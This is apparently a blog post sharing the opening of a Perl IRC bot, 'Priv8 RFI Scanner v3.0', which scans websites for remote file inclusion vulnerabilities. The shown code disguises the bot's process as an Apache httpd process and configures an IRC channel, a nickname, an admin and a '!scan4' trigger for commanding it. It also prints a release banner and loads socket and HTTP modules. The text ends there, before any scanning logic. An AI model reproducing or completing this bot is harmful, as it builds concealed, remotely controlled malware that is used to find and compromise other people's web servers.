
Berita Terkini : Film Indonesia

Rabu, 01 Desember 2010

Zell Scanner

DATE :Juli 2008
LINGUAGE: perl (.pl)


$process = "/usr/local/apache/bin/httpd -DSSL";
my $printcmd = "";
my $id = "";
my $spread = "";
my $ircserver = "";
my $start = "!scan4";
my $port = "6667";
my $nickname = "kill[RFI][" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v3.0 FULL VERSION";

print "\n";
print " Priv 8 Scanner\n";
print " Author: ara";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;

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